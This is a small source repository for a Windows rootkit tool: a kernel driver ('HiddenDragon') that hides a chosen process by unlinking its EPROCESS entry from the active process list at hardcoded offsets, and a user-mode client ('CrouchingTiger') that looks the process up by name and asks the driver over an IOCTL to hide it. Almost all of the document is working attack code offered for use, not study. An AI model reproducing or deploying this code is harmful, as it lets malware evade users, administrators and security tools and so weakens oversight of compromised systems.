├── HiddenDragon ├── ntapi.h ├── definitions.h └── Driver.c ├── CrouchingTiger ├── Source.cpp └── tiger.h └── .gitignore /HiddenDragon/ntapi.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | NTKERNELAPI 6 | NTSTATUS 7 | PsLookupProcessByProcessId( 8 | _In_ HANDLE ProcessId, 9 | _Out_ PEPROCESS* Process 10 | ); 11 | -------------------------------------------------------------------------------- /HiddenDragon/definitions.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define IOCTL_PROCESS_HIDE CTL_CODE(FILE_DEVICE_UNKNOWN, 0xdeadbeef, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 4 | 5 | #define HIDE_STATUS_SUCCESS 808 6 | #define HIDE_STATUS_FAILURE 404 7 | 8 | #define ACTIVE_PROCESS_LINKS_FLINK 0x2f0 9 | #define IMAGE_FILE_NAME 0x450 10 | -------------------------------------------------------------------------------- /CrouchingTiger/Source.cpp: -------------------------------------------------------------------------------- 1 | #include "tiger.h" 2 | 3 | int main(int argc, char** argv) 4 | { 5 | if (argc != 2) 6 | { 7 | printf("[CTHD]: Invalid arguments\n"); 8 | printf("[CTHD]: Usage \"cthd ProcessToHide.exe\""); 9 | exit(EXIT_FAILURE); 10 | } 11 | system("cls"); 12 | CrouchingTiger tiger(argv[1]); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | -------------------------------------------------------------------------------- /CrouchingTiger/tiger.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | #define IOCTL_PROCESS_HIDE CTL_CODE(FILE_DEVICE_UNKNOWN, 0xdeadbeef, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 7 | 8 | #define HIDE_STATUS_SUCCESS 808 9 | #define HIDE_STATUS_FAILURE 404 10 | 11 | class CrouchingTiger 12 | { 13 | private: 14 | HANDLE hDriver; 15 | 16 | DWORD GetProcessIdByProcessName(char* processName) 17 | { 18 | DWORD pID = NULL; 19 | HANDLE ss = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 20 | if (ss != INVALID_HANDLE_VALUE) 21 | { 22 | PROCESSENTRY32 pe; 23 | pe.dwSize = sizeof(PROCESSENTRY32); 24 | do 25 | { 26 | if (!strcmp(pe.szExeFile, processName)) 27 | { 28 | pID = pe.th32ProcessID; 29 | } 30 | } while (Process32Next(ss, &pe)); 31 | CloseHandle(ss); 32 | } 33 | return pID; 34 | } 35 | 36 | public: 37 | CrouchingTiger(char* processName) 38 | { 39 | DWORD pid = GetProcessIdByProcessName(processName); 40 | if (pid != 0) 41 | { 42 | printf("[CTHD]: %s found | Process Id: %d\n", processName, pid); 43 | hDriver = CreateFileA("\\\\.\\HiddenDragon", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); 44 | if (hDriver != INVALID_HANDLE_VALUE) 45 | { 46 | printf("[CTHD]: HiddenDragon.sys handle opened\n"); 47 | 48 | if (DeviceIoControl(hDriver, IOCTL_PROCESS_HIDE, &pid, sizeof(pid), &pid, sizeof(pid), 0, 0)) 49 | { 50 | printf("[CTHD]: Hiding %s ...\n", processName); 51 | if (pid == HIDE_STATUS_SUCCESS) 52 | { 53 | printf("[CTHD]: %s successfully hidden\n", processName); 54 | } 55 | else 56 | { 57 | printf("[CTHD]: %s was not hidden\n", processName); 58 | } 59 | } 60 | else 61 | { 62 | printf("[CTHD]: Communication with HiddenDragon.sys failed\n"); 63 | } 64 | CloseHandle(hDriver); 65 | printf("[CTHD]: HiddenDragon.sys handle closed\n"); 66 | } 67 | else 68 | { 69 | printf("[CTHD]: HiddenDragon.sys is not loaded\n"); 70 | } 71 | } 72 | else 73 | { 74 | printf("[CTHD]: %s is not running\n", processName); 75 | } 76 | printf("[CTHD]: Exiting\n"); 77 | } 78 | }; 79 | -------------------------------------------------------------------------------- /HiddenDragon/Driver.c: -------------------------------------------------------------------------------- 1 | #include "ntapi.h" 2 | #include "definitions.h" 3 | 4 | PDEVICE_OBJECT pDeviceObject; 5 | UNICODE_STRING rDevices, rDosDevices; 6 | 7 | ULONG HideProcess(ULONG pid) 8 | { 9 | BYTE* eprocess; 10 | ULONG status = HIDE_STATUS_FAILURE; 11 | if (NT_SUCCESS(PsLookupProcessByProcessId(pid, &eprocess))) 12 | { 13 | KIRQL irql = KeRaiseIrqlToDpcLevel(); 14 | PLIST_ENTRY procEntry, prevEntry, nextEntry; 15 | 16 | procEntry = ((LIST_ENTRY*)(eprocess + ACTIVE_PROCESS_LINKS_FLINK)); 17 | prevEntry = procEntry->Blink; 18 | nextEntry = procEntry->Flink; 19 | 20 | nextEntry->Blink = prevEntry; 21 | prevEntry->Flink = nextEntry; 22 | procEntry->Flink = procEntry; 23 | procEntry->Blink = procEntry; 24 | 25 | KeLowerIrql(irql); 26 | status = HIDE_STATUS_SUCCESS; 27 | } 28 | return status; 29 | } 30 | 31 | NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject) 32 | { 33 | DbgPrintEx(0, 0, "HiddenDragon.sys Unloaded\n"); 34 | IoDeleteSymbolicLink(&rDosDevices); 35 | IoDeleteDevice(pDriverObject->DeviceObject); 36 | return STATUS_SUCCESS; 37 | } 38 | 39 | NTSTATUS DriverDispatch(PDEVICE_OBJECT pDeviceObject, PIRP irp) 40 | { 41 | NTSTATUS status; 42 | ULONG bytesio = 0; 43 | PIO_STACK_LOCATION pio; 44 | pio = IoGetCurrentIrpStackLocation(irp); 45 | 46 | switch (pio->Parameters.DeviceIoControl.IoControlCode) 47 | { 48 | case IOCTL_PROCESS_HIDE: 49 | PULONG output = (PULONG)irp->AssociatedIrp.SystemBuffer; 50 | *output = HideProcess(*output); 51 | status = STATUS_SUCCESS; 52 | bytesio = sizeof(output); 53 | break; 54 | 55 | default: 56 | status = STATUS_INVALID_PARAMETER; 57 | bytesio = 0; 58 | break; 59 | } 60 | irp->IoStatus.Status = status; 61 | irp->IoStatus.Information = bytesio; 62 | IoCompleteRequest(irp, IO_NO_INCREMENT); 63 | return status; 64 | } 65 | 66 | NTSTATUS CreateCall(PDEVICE_OBJECT pDeviceObject, PIRP irp) 67 | { 68 | irp->IoStatus.Status = STATUS_SUCCESS; 69 | irp->IoStatus.Information = 0; 70 | IoCompleteRequest(irp, IO_NO_INCREMENT); 71 | return STATUS_SUCCESS; 72 | } 73 | 74 | NTSTATUS CloseCall(PDEVICE_OBJECT pDeviceObject, PIRP irp) 75 | { 76 | irp->IoStatus.Status = STATUS_SUCCESS; 77 | irp->IoStatus.Information = 0; 78 | IoCompleteRequest(irp, IO_NO_INCREMENT); 79 | return STATUS_SUCCESS; 80 | } 81 | 82 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath) 83 | { 84 | DbgPrintEx(0, 0, "HiddenDragon.sys Loaded\n"); 85 | RtlInitUnicodeString(&rDevices, L"\\Device\\HiddenDragon"); 86 | RtlInitUnicodeString(&rDosDevices, L"\\DosDevices\\HiddenDragon"); 87 | 88 | IoCreateDevice(pDriverObject, 0, &rDevices, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject); 89 | IoCreateSymbolicLink(&rDosDevices, &rDevices); 90 | 91 | pDriverObject->MajorFunction[IRP_MJ_CREATE] = CreateCall; 92 | pDriverObject->MajorFunction[IRP_MJ_CLOSE] = CloseCall; 93 | pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch; 94 | pDriverObject->DriverUnload = UnloadDriver; 95 | 96 | pDeviceObject->Flags |= DO_DIRECT_IO; 97 | pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING; 98 | 99 | return STATUS_SUCCESS; 100 | } 101 | --------------------------------------------------------------------------------